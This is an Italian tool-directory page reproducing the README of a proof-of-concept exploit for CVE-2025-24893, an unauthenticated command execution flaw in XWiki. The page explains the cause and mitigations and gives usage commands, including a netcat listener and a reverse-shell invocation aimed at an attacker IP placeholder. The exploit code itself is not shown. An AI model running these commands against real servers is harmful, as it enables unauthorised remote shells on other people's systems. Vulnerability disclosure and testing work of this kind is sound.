Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24893-PoC — Prova di concetto per CVE-2025-24893 che dimostra l'esecuzione remota non autenticata di comandi in XWiki attraverso una valutazione non sicura di template lato server. | Kitploit
Strumenti/GitHubGitHub/breakingrohit/cve-2025-24893-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo Payload
GitHubbreakingrohit/cve-2025-24893-poc

CVE-2025-24893-PoC

Prova di concetto per CVE-2025-24893 che dimostra l'esecuzione remota non autenticata di comandi in XWiki attraverso una valutazione non sicura di template lato server.

Vedi Repository
228 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24893 – Esecuzione Comandi Remota su XWiki (Proof of Concept)

Panoramica

Questo repository contiene un Proof of Concept (PoC) controllato per CVE-2025-24893, una vulnerabilità di Esecuzione Comandi Remota (RCE) non autenticata che colpisce XWiki.

La vulnerabilità consente a un attacker di eseguire comandi arbitrari del sistema operativo sul server a causa di una valutazione non sicura di template e script lato server.


Informazioni su XWiki

XWiki è una piattaforma wiki enterprise open-source comunemente utilizzata per:

  • Documentazione interna
  • Basi di conoscenza
  • Portali di collaborazione di team

Poiché XWiki è spesso distribuito su server esposti a Internet, le vulnerabilità nella gestione delle richieste e nella logica di scripting possono avere un alto impatto nel mondo reale.


Riepilogo della Vulnerabilità

  • ID CVE: CVE-2025-24893
  • Categoria: Iniezione di Template lato server che porta all'Esecuzione di Comandi Remota
  • Vettore d'Attacco: Richiesta HTTP GET
  • Autenticazione Richiesta: Nessuna
  • Impatto: Esecuzione arbitraria di comandi con privilegi del server

Causa Radice

L'input controllato dall'utente passato all'endpoint SolrSearch non è stato validato e valutato correttamente dal motore di scripting Groovy. Ciò ha permesso che l'input fornito dall'attaccante fosse interpretato come codice eseguibile lato server, con conseguente esecuzione di comandi sul sistema host.


Versioni Affette

  • Versioni di XWiki fino alla 15.10.10 inclusa
  • Corretto nelle versioni successive

Capacità del Proof of Concept

Questo PoC dimostra quanto segue:

  • Modalità di Rilevamento Vulnerabilità Conferma in sicurezza se l'istanza target è vulnerabile eseguendo un'espressione lato server benigna.

  • Esecuzione Comandi Remota Dimostra l'esecuzione arbitraria di comandi sul sistema target.

  • Esecuzione Reverse Shell Stabilisce una connessione shell in uscita dal target al tester.

  • Bind Shell (Opzionale) Apre una shell in ascolto sull'host target (meno affidabile delle reverse shell).


Utilizzo

Verifica Vulnerabilità

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m check

Reverse Shell (Consigliata)

root@kitploit:~
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444

Bind Shell

root@kitploit:~
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444

Flusso d'Attacco Generale

  1. Viene inviata una richiesta manipolata all'endpoint vulnerabile SolrSearch
  2. Istruzioni di template dannose vengono iniettate tramite input controllato dall'utente
  3. L'input viene valutato dal motore Groovy come codice fidato
  4. Comandi arbitrari del sistema operativo vengono eseguiti sul server

Raccomandazioni di Mitigazione

  • Aggiornare XWiki a una versione corretta immediatamente
  • Limitare l'accesso agli endpoint interni dove possibile
  • Limitare o isolare la funzionalità di scripting lato server
  • Monitorare i log dell'applicazione per comportamenti anomali di esecuzione dei template

Disclaimer

Questo progetto è fornito strettamente per scopi educativi e test di sicurezza autorizzati. Qualsiasi uso non autorizzato di questo codice contro sistemi senza esplicita autorizzazione è vietato.


Crediti

  • Ricerca originale della vulnerabilità e ispirazione del PoC di Al Baradi Joy
  • Rifattorizzato ed esteso per ricerca educativa e difensiva sulla sicurezza

Scopo di Questo Repository

Questo repository è stato creato per dimostrare:

  • Analisi di vulnerabilità del mondo reale
  • Sviluppo sicuro e responsabile di proof-of-concept
  • Comprensione dell'iniezione di template lato server e dei rischi di RCE
  • Consapevolezza difensiva e considerazioni sulla mitigazione
Scarica lo strumento